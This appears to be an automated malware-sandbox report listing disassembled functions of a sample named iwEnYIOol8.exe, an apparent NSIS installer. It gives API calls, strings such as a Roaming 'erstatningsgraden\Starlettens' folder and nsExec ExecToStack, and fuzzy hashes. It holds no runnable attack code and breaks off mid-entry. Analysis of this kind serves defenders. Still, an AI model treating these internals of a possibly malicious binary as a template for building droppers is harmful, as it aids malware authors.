Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

Function 00403082 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403093
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\iwEnYIOol8.exe,00000400), ref: 004030AF

Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\iwEnYIOol8.exe,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\iwEnYIOol8.exe,C:\Users\user\Desktop\iwEnYIOol8.exe,80000000,00000003), ref: 004030FB
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231

Strings

soft, xrefs: 00403170
C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8
"C:\Users\user\Desktop\iwEnYIOol8.exe", xrefs: 00403088
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403089
Inst, xrefs: 00403167
Null, xrefs: 00403179
Error launching installer, xrefs: 004030D2
C:\Users\user\Desktop\iwEnYIOol8.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\iwEnYIOol8.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\iwEnYIOol8.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-4138872458
Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

Function 00406594 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066B6
GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,antholite,?,?,00000000,00000000,00424620,771B23A0), ref: 004066CC
SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 0040672A
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,antholite,?,?,00000000,00000000,00424620,771B23A0), ref: 0040675E
lstrlenW.KERNEL32(: Completed,00000000,antholite,?,?,00000000,00000000,00424620,771B23A0), ref: 004067B8

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687
antholite, xrefs: 004065B8
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758
: Completed, xrefs: 004065C1, 0040667B, 00406682, 00406686, 0040669F, 004066A0, 004066B5, 004066CB, 004066FC, 00406728, 0040675D, 00406763, 00406780, 00406793, 004067B1, 004067B7, 004067C0, 004067F5

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$antholite
API String ID: 4024019347-2831730964
Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

Function 004032B9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403323
GetTickCount.KERNEL32 ref: 004033CA
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033F3
wsprintfW.USER32 ref: 00403406

Strings

FB, xrefs: 004033A7, 004033C2, 0040343F
*B, xrefs: 004032E4
A, xrefs: 00403483
A, xrefs: 00403379
... %d%%, xrefs: 00403400

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ FB$ A$ A$... %d%%
API String ID: 551687249-3833040932
Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden\Starlettens,?,?,00000031), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden\Starlettens,?,?,00000031), ref: 004017DA

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,771B23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,771B23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,771B23A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Strings

C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp, xrefs: 00401826, 00401844
ExecToStack, xrefs: 00401792, 0040179B, 004017A8, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B
C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp\nsExec.dll, xrefs: 0040183A, 00401856
C:\Users\user\AppData\Roaming\erstatningsgraden\Starlettens, xrefs: 004017A3

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp$C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\erstatningsgraden\Starlettens$ExecToStack
API String ID: 1941528284-2136405846
Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

Function 004055DC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(antholite,00000000,00424620,771B23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,771B23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,771B23A0), ref: 00405637
SetWindowTextW.USER32(antholite,antholite), ref: 00405649
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Strings

antholite, xrefs: 004055FD, 0040560D, 00405613, 00405636, 00405642

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: antholite
API String ID: 2531174081-3488562018
Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
wsprintfW.USER32 ref: 0040692D
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Strings

%s%S.dll, xrefs: 00406927
UXTHEME, xrefs: 004068E4

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406094
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040381C), ref: 004060AF

Strings

nsa, xrefs: 00406083
C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040607B

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
API String ID: 1716503409-3083371207
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,?,00405F45,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C83,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\iwEnYIOol8.exe"), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\erstatningsgraden\Starlettens,?,00000000,000000F0), ref: 00401652

Strings

C:\Users\user\AppData\Roaming\erstatningsgraden\Starlettens, xrefs: 00401645

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\erstatningsgraden\Starlettens
API String ID: 1892508949-3115307435
Opcode ID: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
Opcode Fuzzy Hash: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E

Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108

Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,771B23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,771B23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,771B23A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
Opcode Fuzzy Hash: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D

Function 0040252F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,00000000,00000011,00000002), ref: 00402602

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: de231594f5fd9ed2f3d170b787f0c7ae88dddfe38e809d01203d2a2c86ad2b9e
Instruction ID: fa4e9c421320e09d3f2bb14c05bc69cdd2f01bdd483ca55c6e8c3e2e171c6fbc
Opcode Fuzzy Hash: de231594f5fd9ed2f3d170b787f0c7ae88dddfe38e809d01203d2a2c86ad2b9e
Instruction Fuzzy Hash: 11116A71900219EBDB14DFA0DA989AEB7B4FF04349B20447FE406B62C0D7B85A45EB5E

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
